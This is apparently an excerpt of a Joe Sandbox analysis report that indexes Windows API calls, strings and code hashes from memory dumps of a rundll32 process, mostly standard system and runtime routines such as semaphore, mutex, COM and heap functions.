                                • Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd
                                Similarity
                                • API ID: CharNext
                                • String ID: /$localserver$sta
                                • API String ID: 3213498283-3694077230
                                • Opcode ID: eb375fbc92613f5c8e3801cbad202a81c28a3742a6c97f264d7d3db43ac3548b
                                • Instruction ID: 06a7272783ddec52640a1bc13cc7320cc33af81b9d0c2ffaad8158fcf577c433
                                • Opcode Fuzzy Hash: eb375fbc92613f5c8e3801cbad202a81c28a3742a6c97f264d7d3db43ac3548b
                                • Instruction Fuzzy Hash: DE718379E0061ADBCF24DF79A41067BB7F1EF54750F64486AE885EB2C0EA708E41EB50
                                Strings
                                • RTL: Re-Waiting, xrefs: 049D7BAC
                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 049D7B7F
                                • RTL: Resource at %p, xrefs: 049D7B8E
                                Memory Dump Source
                                • Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                • Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd
                                Similarity
                                • API ID:
                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                • API String ID: 0-871070163
                                • Opcode ID: 59c88af7220a9053c261760bf8447b44907ece0530d28b4dc7e3b45ec6fdf33a
                                • Instruction ID: 577294b62bf4ec226000b2147367796d218d0a1ae8ab7b888d29e020feddcb5d
                                • Opcode Fuzzy Hash: 59c88af7220a9053c261760bf8447b44907ece0530d28b4dc7e3b45ec6fdf33a
                                • Instruction Fuzzy Hash: E141C2357407029FDB20EE29D840B6AB7E9FF88715F100A3DE95A9B680DB75F8058B91
                                APIs
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 049D728C
                                Strings
                                • RTL: Re-Waiting, xrefs: 049D72C1
                                • RTL: Resource at %p, xrefs: 049D72A3
                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 049D7294
                                Memory Dump Source
                                • Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                • Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                • API String ID: 885266447-605551621
                                • Opcode ID: c5b4224d800cb91b5ee92533aaf2abe6a94970ef208afb641579005a21fecffb
                                • Instruction ID: a03b1cd95004795b4cbc28824958b3d702424219d6eb9ef7b9953d419048bf2b
                                • Opcode Fuzzy Hash: c5b4224d800cb91b5ee92533aaf2abe6a94970ef208afb641579005a21fecffb
                                • Instruction Fuzzy Hash: 9341FF31700246ABDB20DE69CC41F6AB7E9FB94714F104A39FA55AB240DB30F852DBD1
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                • Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd
                                Similarity
                                • API ID: ___swprintf_l
                                • String ID: %%%u$]:%u
                                • API String ID: 48624451-3050659472
                                • Opcode ID: f2428eed9dfb4c46df865b4b6658b89115f274204b4d85a90b9fd3206d99ac04
                                • Instruction ID: cca49ce833f43bac1f24e66f5b07dd1caf872076c39404d563f5ba664ccf9fe8
                                • Opcode Fuzzy Hash: f2428eed9dfb4c46df865b4b6658b89115f274204b4d85a90b9fd3206d99ac04
                                • Instruction Fuzzy Hash: 9A318673A002199FDB20DF29CD40BEEB7B8EB44750F4445A5E849E3210EB30FA558FA1
                                APIs
                                • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0(001F0003,00000000,?), ref: 00A02CC6
                                • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00A02CD2
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                • Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd
                                Similarity
                                • API ID: ErrorLastOpenSemaphore
                                • String ID: _p0$`(u
                                • API String ID: 1909229842-760671758
                                • Opcode ID: d0957f1583ccb986097969054f13f843c5e73cd0a5d0325289e74bc177786d40
                                • Instruction ID: 6a774ddf49afdca55a205a9c31861163de402436cce8fd69baebc07a6722d3ce
                                • Opcode Fuzzy Hash: d0957f1583ccb986097969054f13f843c5e73cd0a5d0325289e74bc177786d40
                                • Instruction Fuzzy Hash: 4321C27120430E9FD315EF19E999AABB7E9EBD8310F10462DF85587391DB30DC068BA2
                                APIs
                                • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernelbase.dll), ref: 00A024EB
                                • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RaiseFailFastException), ref: 00A024F7
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                • Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd
                                Similarity
                                • API ID: AddressHandleModuleProc
                                • String ID: RaiseFailFastException$kernelbase.dll
                                • API String ID: 1646373207-919018592
                                • Opcode ID: d552110bd18d7e9a8328c440203350fa1ec1e06df80c1d6987966c084c88dd07
                                • Instruction ID: adf365f7b5dc7de65ca6913f0d3b824b966210766407d6a5ea738cfc740ef132
                                • Opcode Fuzzy Hash: d552110bd18d7e9a8328c440203350fa1ec1e06df80c1d6987966c084c88dd07
                                • Instruction Fuzzy Hash: 04E0EC7694022DB7CB226FE1EC0CDCB7F29FB487A17004421FD09921A1CA718812DBA0
                                APIs
                                  • Part of subcall function 00A03C66: LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,00000008), ref: 00A03C87
                                  • Part of subcall function 00A03C66: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000008), ref: 00A03C93
                                  • Part of subcall function 00A03D62: _wtoi.MSVCRT(?), ref: 00A03D94
                                  • Part of subcall function 00A03D62: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?), ref: 00A03DA0
                                • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000400,?,?,00000000,00000000,00000000,00000000), ref: 00A03EF5
                                • LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000000), ref: 00A03F00
                                • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000400,?,?,00000000,00000000,00000000,00000000), ref: 00A03F1E
                                • FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?), ref: 00A03F5C
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                • Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd
                                Similarity
                                • API ID: ByteCharLibraryMultiWide$AddressAllocErrorFreeLastLoadLocalProc_wtoi
                                • String ID:
                                • API String ID: 1343397253-0
                                • Opcode ID: f72173c3f8162940f1e8caefde7c28d416476212bf0ad472a98f0ac79ae94a6f
                                • Instruction ID: fb6b3bd06c1e50163d204a6ba83252310e8a23bf7bcdcb2d0ea48797b46c1b30
                                • Opcode Fuzzy Hash: f72173c3f8162940f1e8caefde7c28d416476212bf0ad472a98f0ac79ae94a6f
                                • Instruction Fuzzy Hash: 5B312176A0020AEFDB14CFA9D8549AFB7B9EFC9704F148459E905D7390D7709E02CB60
                                APIs
                                • AcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00A03381
                                • ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00A0339A
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                • Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd
                                Similarity
                                • API ID: ExclusiveLock$AcquireRelease
                                • String ID:
                                • API String ID: 17069307-0
                                • Opcode ID: 5e40ffe33c9a5660ca9af097bfa21844ae0349de382163aafa279913f4a17f55
                                • Instruction ID: 9e49aae0f72655120657da2e49be208b962dee2428b0fb954db3b0ba2a97d2bf
                                • Opcode Fuzzy Hash: 5e40ffe33c9a5660ca9af097bfa21844ae0349de382163aafa279913f4a17f55
                                • Instruction Fuzzy Hash: 35318476610529EFCB05DB59D88896EB7B9FF4D310B054195E806DB3A1CB30AE03CB91
                                APIs
                                • CoInitializeEx.API-MS-WIN-CORE-COM-L1-1-0(00000000,00000006), ref: 00A04003
                                • CLSIDFromString.API-MS-WIN-CORE-COM-L1-1-0(?,?), ref: 00A04012
                                • CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(?,00000000,00000001,00A01970,?,?,?), ref: 00A0402D
                                • CoUninitialize.API-MS-WIN-CORE-COM-L1-1-0(?,?), ref: 00A0405E
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                • Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd
                                Similarity
                                • API ID: CreateFromInitializeInstanceStringUninitialize
                                • String ID:
                                • API String ID: 2575628211-0
                                • Opcode ID: b517a40b1850ee127997939dead4602968f766b52055fa16ecd76fcec0215d2c
                                • Instruction ID: 29f2cb44745835a9693a74a9aa1824447394898cf8e1e16ec94020d158c2f99a
                                • Opcode Fuzzy Hash: b517a40b1850ee127997939dead4602968f766b52055fa16ecd76fcec0215d2c
                                • Instruction Fuzzy Hash: 4C110C31B0021CAFDB14DFA5DC49EAF7BB9EB8C710F000059E606E7291DB65A903CBA5
                                APIs
                                  • Part of subcall function 00A06598: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00A0659F
                                • __set_app_type.MSVCRT ref: 00A05E92
                                • __p__fmode.MSVCRT ref: 00A05EA8
                                • __p__commode.MSVCRT ref: 00A05EB6
                                • __setusermatherr.MSVCRT ref: 00A05ED7
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                • Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd
                                Similarity
                                • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                • String ID:
                                • API String ID: 1632413811-0
                                • Opcode ID: 357b35af7407d049874d7102678902ff9e1c959957b9cb8c93b0a539a773091b
                                • Instruction ID: 19bd7f8681887d8a3bd0e3a648faffb0a9f8acacf16b3d3cee2ecb74b31252df
                                • Opcode Fuzzy Hash: 357b35af7407d049874d7102678902ff9e1c959957b9cb8c93b0a539a773091b
                                • Instruction Fuzzy Hash: 4AF0F8B054030D9FCB28EFB0BD4E6093B60BB19735F104A19E4A1862F6DF799067CE14
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                • Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd
                                Similarity
                                • API ID: __aulldvrm
                                • String ID: +$-
                                • API String ID: 1302938615-2137968064
                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                • Instruction ID: 67ae14bdacfee49f6d461c49b62f551b1f345643d46fbf507311757a9f67c880
                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                • Instruction Fuzzy Hash: 58919A70E402169FDF24DF99C8866BEB7A9EF44710F14457AE855E72D0E730E96087D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                • Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd
                                Similarity
                                • API ID:
                                • String ID: $$@
                                • API String ID: 0-1194432280
                                • Opcode ID: f152d63901466cb9db1788066ff565bf67ed736f67b1bd05aaa54fc2205d16ae
                                • Instruction ID: a4815fadfecf620be5a00ed5a068b918b0ac8b5d7fbc06f5b1061b5374e60b19
                                • Opcode Fuzzy Hash: f152d63901466cb9db1788066ff565bf67ed736f67b1bd05aaa54fc2205d16ae
                                • Instruction Fuzzy Hash: 21811BB1D002699BDB31DF54CD44BEEB7B8AB48714F1141EAA919B7240E7306E85CFA1
                                APIs
                                • RoOriginateError.API-MS-WIN-CORE-WINRT-ERROR-L1-1-0(80040111,?), ref: 00A055D9
                                  • Part of subcall function 00A033F9: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00A03431
                                  • Part of subcall function 00A033F9: DecodePointer.API-MS-WIN-CORE-UTIL-L1-1-0(?), ref: 00A03443
                                  • Part of subcall function 00A033F9: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00A0346A
                                • RoOriginateErrorW.API-MS-WIN-CORE-WINRT-ERROR-L1-1-0(80070057,00000012,?), ref: 00A05616
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                • Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd
                                Similarity
                                • API ID: ErrorLockOriginateShared$AcquireDecodePointerRelease
                                • String ID: activatibleClassId
                                • API String ID: 3068322146-2691401494
                                • Opcode ID: 3103e7ea41e81e3a0680204764b5e086ff5f82b2774844419398b624ac42d7dc
                                • Instruction ID: f91dd5be3e8db0c68691de252676d807eb3b1d50a702ea2ab4852de69d6b6f1d
                                • Opcode Fuzzy Hash: 3103e7ea41e81e3a0680204764b5e086ff5f82b2774844419398b624ac42d7dc
                                • Instruction Fuzzy Hash: A1415C71E1061CEBDB14DFA4EC44AAFB7BAFF48710F154015E806A7291DB71AD02CBA0
                                APIs
                                • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000040,?,00000000,00000000), ref: 00A04771
                                • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,?,00000000,001F0001,?,?,?,?,?,00000000), ref: 00A047A5
                                  • Part of subcall function 00A046CA: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,00A02B21,00000000,?,?), ref: 00A046DA
                                  • Part of subcall function 00A046CA: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,00A02B21,00000000,?,?), ref: 00A046E9
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                • Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd
                                Similarity
                                • API ID: ErrorLast$CreateCurrentMutexProcess
                                • String ID: Local\SM0:%d:%d:%hs
                                • API String ID: 779401067-4162240545
                                • Opcode ID: 6bb5ac0c9b38c10b61a9c078f3045e7e55ca2bf979f141a2092a37ba52bb3ac5
                                • Instruction ID: 374b0b1078f600ef576c4df901040a46718155ce459e749f183a7bfc1583241f
                                • Opcode Fuzzy Hash: 6bb5ac0c9b38c10b61a9c078f3045e7e55ca2bf979f141a2092a37ba52bb3ac5
                                • Instruction Fuzzy Hash: AA41D6B1E0023CA7CB21DB64ED89BEA7779BB58740F104595F909A72C1DB709E45CBD0
                                APIs
                                • GetModuleHandleExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000006,?,?), ref: 00A023FB
                                • GetModuleFileNameA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,00000104), ref: 00A0243A
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                • Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd
                                Similarity
                                • API ID: Module$FileHandleName
                                • String ID: Vu
                                • API String ID: 4146042529-807871483
                                • Opcode ID: ae3f7bc0a0cf2f3913796c5cd3a11fa4e405eafdb3206cc191d8fa09a6d99493
                                • Instruction ID: 2c9668ed022df22b78f11449209ba2bc027bf699e66dc1469897a7c19185b216
                                • Opcode Fuzzy Hash: ae3f7bc0a0cf2f3913796c5cd3a11fa4e405eafdb3206cc191d8fa09a6d99493
                                • Instruction Fuzzy Hash: 9221F531A0032D9BCF28CF55EC88BEA77B8AF55704F0441A9D98AD7181DBB19E85CF90
                                APIs
                                • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,?,00A04B2F,?,00000000,00000000,?,?,?,00000000,?), ref: 00A02E80
                                • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,00000000,?,?,?,00A048A0,?,?,?,?,00000000), ref: 00A02E87
                                • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,00A04B2F,?,00000000,00000000,?,?,?,00000000,?,?,?,00A048A0), ref: 00A02EA5
                                • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,00000000,?,?,?,00A048A0,?,?,?,?,00000000), ref: 00A02EAC
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                • Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$FreeProcess
                                • String ID:
                                • API String ID: 3859560861-0
                                • Opcode ID: f288f51062cdc98bba80dda6e0ea7ba36a5e2fdb6e17892bce691b757c16afdc
                                • Instruction ID: df4c923c9326d9f5382fe637ce47a8f058de4f7b511de723b39f57988ba1f3ba
                                • Opcode Fuzzy Hash: f288f51062cdc98bba80dda6e0ea7ba36a5e2fdb6e17892bce691b757c16afdc
                                • Instruction Fuzzy Hash: CBF04F72210215AFDB14CFA1EC88BA6BBF8FF48312F110529F241C6090D7B5E996CBA0